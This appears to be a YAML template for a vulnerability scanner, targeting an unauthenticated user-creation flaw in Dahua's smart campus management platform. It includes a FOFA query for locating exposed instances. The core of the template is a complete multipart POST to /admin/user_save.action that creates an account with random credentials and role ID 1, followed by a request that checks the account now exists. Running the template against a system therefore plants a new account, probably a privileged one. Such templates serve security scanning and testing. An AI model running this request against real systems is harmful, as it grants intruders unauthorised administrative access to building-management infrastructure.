name: dahua-zhyq-create-user-unauth

info:
  name: dahua zhyq user_save.action create user unauth
  author: IMF5er
  severity: high
  reference:
    - https://www.fiversec.com/
  description: |
  大华智慧园区综合管理平台 user_save.action 接口存在未授权任意用户创建漏洞
  fofa: app="dahua-智慧园区综合管理平台"

set:
  r1: randomLowercase(8)
  r2: randomLowercase(8)
  hostname: request.url.host
rules:
  req0:
    request:
      raw: |
        POST /admin/user_save.action HTTP/1.1
        Host: {{hostname}}
        Accept-Encoding: gzip
        Content-Length: 914
        Content-Type: multipart/form-data; boundary=----fxwrpqcy
        Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C

        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.userType"

        0
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.ownerCode"

        001
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.isReuse"

        0
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.macStat"

        0
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.roleIds"

        1
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.loginName"

        {{r1}}
        ------fxwrpqcy
        Content-Disposition: form-data; name="displayedOrgName"

        {{r1}}
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.loginPass"

        {{r2}}
        ------fxwrpqcy
        Content-Disposition: form-data; name="checkPass"

        {{r2}}
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.groupId"

        0
        ------fxwrpqcy
        Content-Disposition: form-data; name="userBean.userName"

        {{r1}}
        ------fxwrpqcy--
    expression: response.status == 200
  req1:
    request:
      method: POST
      path: /WPMS/getPublicKey
      headers:
        Content-Type: application/json
        Accept-Encoding: gzip
      body: |
        {"loginName":"{{r1}}"}
    expression: response.status == 200 && response.body.bcontains("success") && response.body.bcontains("true")
expression: req0() && req1()
